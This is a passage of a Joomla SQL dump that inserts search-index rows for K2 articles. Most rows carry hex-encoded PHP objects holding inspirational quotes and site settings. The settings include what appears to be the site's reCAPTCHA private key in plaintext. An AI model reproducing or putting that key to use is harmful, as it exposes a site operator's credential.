696665223b733a31313a226465736372697074696f6e223b733a3536313a2220446f206e6f74206477656c6c20696e2074686520706173742c20646f206e6f7420647265616d206f6620746865206675747572652c20636f6e63656e747261746520746865206d696e64206f6e207468652070726573656e74206d6f6d656e742e204e657665722062652062756c6c69656420696e746f2073696c656e63652e204e6576657220616c6c6f7720796f757273656c6620746f206265206d61646520612076696374696d2e20416363657074206e6f206f6e65277320646566696e6974696f6e206f6620796f7572206c6966653b20646566696e6520796f757273656c662e20446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a303b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031332d30312d30332030303a30303a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031332d30312d30332030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(160, 'index.php?option=com_k2&view=item&id=2', 'index.php?option=com_k2&view=item&id=2:be-kind-whenever-possible', 'Be kind whenever possible', ' Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself. Don\'t go around saying th', '2017-03-20 18:38:47', '76e65e1b407543b71c532b6edc4eb709', 1, 0, 1, '*', '2013-01-02 00:00:00', '0000-00-00 00:00:00', '2013-01-02 00:00:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2232223b733a353a22616c696173223b733a32353a2262652d6b696e642d7768656e657665722d706f737369626c65223b733a373a2273756d6d617279223b733a3539323a223c7020636c6173733d2264726f70636170223e446f206e6f74206477656c6c20696e2074686520706173742c20646f206e6f7420647265616d206f6620746865206675747572652c20636f6e63656e747261746520746865206d696e64206f6e207468652070726573656e74206d6f6d656e742e204e657665722062652062756c6c69656420696e746f2073696c656e63652e204e6576657220616c6c6f7720796f757273656c6620746f206265206d61646520612076696374696d2e20416363657074206e6f206f6e65277320646566696e6974696f6e206f6620796f7572206c6966653b20646566696e6520796f757273656c662e3c2f703e0d0a3c703e446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e3c2f703e0d0a223b733a343a22626f6479223b733a3736393a220d0a3c703e4974206973206e6f7420746865207374726f6e67657374206f6620746865207370656369657320746861742073757276697665732c206e6f7220746865206d6f737420696e74656c6c6967656e7420746861742073757276697665732e20497420697320746865206f6e65207468617420697320746865206d6f737420616461707461626c6520746f206368616e67652e20416c6c206368616e6765732c206576656e20746865206d6f7374206c6f6e67656420666f722c2068617665207468656972206d656c616e63686f6c793b20666f722077686174207765206c6561766520626568696e6420757320697320612070617274206f66206f757273656c7665733b207765206d7573742064696520746f206f6e65206c696665206265666f72652077652063616e20656e74657220616e6f746865722e3c2f703e0d0a3c703e5b626c6f636b71756f746520617574686f723d22756e6b6e6f776e225d2042656c6965766520696e20796f757273656c6621204861766520666169746820696e20796f7572206162696c69746965732120576974686f757420612068756d626c652062757420726561736f6e61626c6520636f6e666964656e636520696e20796f7572206f776e20706f7765727320796f752063616e6e6f74206265207375636365737366756c206f722068617070792e205b2f626c6f636b71756f74655d3c2f703e0d0a3c703e54616b65207570206f6e6520696465612e204d616b652074686174206f6e65206964656120796f7572206c696665202d207468696e6b206f662069742c20647265616d206f662069742c206c697665206f6e207468617420696465612e204c65742074686520627261696e2c206d7573636c65732c206e65727665732c2065766572792070617274206f6620796f757220626f64792c2062652066756c6c206f66207468617420696465612c20616e64206a757374206c65617665206576657279206f74686572206964656120616c6f6e652e2054686973206973207468652077617920746f20737563636573732e3c2f703e223b733a353a226361746964223b733a313a2234223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031362d31322d33312031383a35353a3436223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a227264617465223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2232223b733a353a227472617368223b733a313a2231223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a383a2246696e616e636573223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a323a223120223b733a31323a2265787472615f6669656c6473223b733a32343a225b7b226964223a2231222c2276616c7565223a2231227d5d223b733a343a22736c7567223b733a32373a22323a62652d6b696e642d7768656e657665722d706f737369626c65223b733a373a22636174736c7567223b733a31303a22343a66696e616e636573223b733a363a22617574686f72223b733a31393a22526576204f6c75736f6c612041796f64656c65223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34353a22636f6d706f6e656e742f6b322f6974656d2f322d62652d6b696e642d7768656e657665722d706f737369626c65223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a31393a22526576204f6c75736f6c612041796f64656c65223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31393a22526576204f6c75736f6c612041796f64656c65223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a383a2246696e616e636573223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a383a2246696e616e636573223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a32343a225b7b226964223a2231222c2276616c7565223a2231227d5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32343a225b7b226964223a2231222c2276616c7565223a2231227d5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32223b733a353a22726f757465223b733a36343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d323a62652d6b696e642d7768656e657665722d706f737369626c65223b733a353a227469746c65223b733a32353a224265206b696e64207768656e6576657220706f737369626c65223b733a31313a226465736372697074696f6e223b733a3536313a2220446f206e6f74206477656c6c20696e2074686520706173742c20646f206e6f7420647265616d206f6620746865206675747572652c20636f6e63656e747261746520746865206d696e64206f6e207468652070726573656e74206d6f6d656e742e204e657665722062652062756c6c69656420696e746f2073696c656e63652e204e6576657220616c6c6f7720796f757273656c6620746f206265206d61646520612076696374696d2e20416363657074206e6f206f6e65277320646566696e6974696f6e206f6620796f7572206c6966653b20646566696e6520796f757273656c662e20446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a303b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031332d30312d30322030303a30303a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031332d30312d30322030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(161, 'index.php?option=com_k2&view=item&id=3', 'index.php?option=com_k2&view=item&id=3:abana-joomla-template-released', 'Copy of Abana Joomla Template Released', ' Abana Joomla Template is a clean and light design using a blend of bright-colors and mouse-picked textures, which makes it suitable for all kinds of websites especially for e-commerce, business or corporate site. Beulah includes a variety of presets for ', '2017-03-20 18:38:47', '9e7f211340f65a958665ec0a252260c5', 1, 0, 1, '*', '2013-01-03 21:11:30', '0000-00-00 00:00:00', '2013-01-05 08:11:22', '0000-00-00 00:00:00', 0, 0, 2, 